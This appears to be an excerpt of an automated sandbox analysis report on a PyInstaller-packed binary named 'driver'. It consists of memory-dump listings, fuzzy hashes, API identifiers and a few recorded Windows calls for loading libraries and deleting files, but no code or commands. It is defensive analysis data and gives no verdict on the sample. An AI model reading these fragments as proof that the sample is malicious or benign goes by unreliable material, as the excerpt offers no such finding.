                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 22509725-0
                                                                                                                                                                                                                                                • Opcode ID: f8ecf692f3926781a35c14d99b3f9fd829dd50894e5b6194ab5df3d00d2e06be
                                                                                                                                                                                                                                                • Instruction ID: 4fee6067973c69008c46eb7172d869e3b2da081929ae1f8118b2a32f1a9f67cd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8ecf692f3926781a35c14d99b3f9fd829dd50894e5b6194ab5df3d00d2e06be
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4116D61B0A68250FE999716A2482BD9351DF55FC4F087431EE4D0BB99EF2CE4828718
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                • Instruction ID: 829dfdb0357ff83dc32e141c7a0253004ebbd566023a4ded59427df2187ccbc8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3821C97265964187DB658F19E44037977E1FB84F98F144234EA9DC76DADF7CE400AB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                                                                                • Opcode ID: 8603938ac5e1fbf28ba7d9b8f40a04eb8b77d7e104ff7c3c46d49aacb8bdd123
                                                                                                                                                                                                                                                • Instruction ID: a6271ce883cda26fb0747ab49f08933e70a316b8d31ca59849d19c59f1ef590d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8603938ac5e1fbf28ba7d9b8f40a04eb8b77d7e104ff7c3c46d49aacb8bdd123
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF21A132E0EB42AAEF649E35EC4137932A0EF01BD4F284435DA4C422D5DF38E861C769
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                • Instruction ID: 069820f5a8b75d1a2d4c780924124f5d940fe3188c43fd58548f20eb99e46ba7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4401D621B4974145EA04DF53990117AA691BF85FE8F084631EE5C97FD7DEBCF111A300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6A29B45E4,00000000,00007FF6A29B1985), ref: 00007FF6A29B9439
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00007FF6A29B6466,?,00007FF6A29B336E), ref: 00007FF6A29B9092
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2592636585-0
                                                                                                                                                                                                                                                • Opcode ID: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
                                                                                                                                                                                                                                                • Instruction ID: 5b6063f5f9633e6a0d3caa7010ccbbf646bb2138d4d777322552c5e59e539422
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7DD0C211F2525541FA54A767BA566395252AFCDFC8F88D035EE0D43B4BDC3CD0415B00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                                                                                • Opcode ID: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
                                                                                                                                                                                                                                                • Instruction ID: 0d644cd7f9f95d056b74ab2916b88c0a13ce35d8bfa767f9a68106b0ca8b5077
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD21A132B08B8096E7549B22A94076AB2A5FB88BD4F144035EB8C03F95CF3CD461CB08
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                                                                                • Opcode ID: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
                                                                                                                                                                                                                                                • Instruction ID: 63eb741c2fb799a1407de97bf5e798fb81dadf24601fa056e6a752ebde911925
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57216D32E0AA42AAFF64AA35EC412793290EF41BD4F288430D94D466D5DF3CE861C779
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                                                                                • Opcode ID: 853e6436f94aa431da519847a64e922f1c6e95587a9ca09828f1910c0d29a45c
                                                                                                                                                                                                                                                • Instruction ID: 4039647d9d5c0d3b0e8204c750f2449c12030089b9c7bd8ee6282cdd03732e82
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 853e6436f94aa431da519847a64e922f1c6e95587a9ca09828f1910c0d29a45c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5F04F22B49B8185E7009B26F8012AAA364FB95FC0F588035EE8D07BA9CF3CD5618718
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,?,00007FF6A29C0D00,?,?,?,00007FF6A29C236A,?,?,?,?,?,00007FF6A29C3B59), ref: 00007FF6A29CD6AA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                                                • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                                • Instruction ID: 8ab37ece2347d4b0b77f19b99d37de510f9f04e0c0dd54ef45faa92d2e629520
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36F05800B8B74659FE647B635A112B952904F94FA8F081230DC2EC63C3DEACF4A0F620
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                                • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                                • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                                • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                                • Instruction ID: b0b0528cd220ea9c628e33689c8daac0aa9a44b99a1d1e5dd53f71b0a2577bba
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FD1A532A4AB8286F7109F36E8542A977A1FF88F5CF400235DA5D83A96DF7CD105E740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446639595.00007FF8A7F81000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FF8A7F80000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446587978.00007FF8A7F80000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A7FCA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A7FD8000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A8027000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A802C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A802F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447146577.00007FF8A8030000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447206184.00007FF8A8032000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a7f80000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3558122275-0
                                                                                                                                                                                                                                                • Opcode ID: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
                                                                                                                                                                                                                                                • Instruction ID: d6a686eea9247cea2beb7fcc735dfa187fe53dd50f20d9e13e7f372ba3eebe28
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B313D7260AB8196FB608F70E850BED7364FB84784F44403ADA4E47B99DF38D648D714
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B841B
                                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B849E
                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B84BD
                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B84CB
                                                                                                                                                                                                                                                • FindClose.KERNEL32(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B84DC
                                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B84E5
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                • String ID: %s\*
                                                                                                                                                                                                                                                • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                                • Instruction ID: 7cc6a4d92746292e324e660eb2de845f3e9c3ac26a77af6037049b802c1b9b68
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F141A521A4E94285EA209B26E4981BD73A1FF98F98F400232D59DC36C7DFBCD546E701
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                                • Opcode ID: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
                                                                                                                                                                                                                                                • Instruction ID: d841c69d77e52ffef0d8f1a727cc344a34f2eb84163862e5b507d69dfad434de
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26315E7260AA8199EF608F60E8443EE3360FB84784F408039DA4D47B95DF7CD568CB24
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
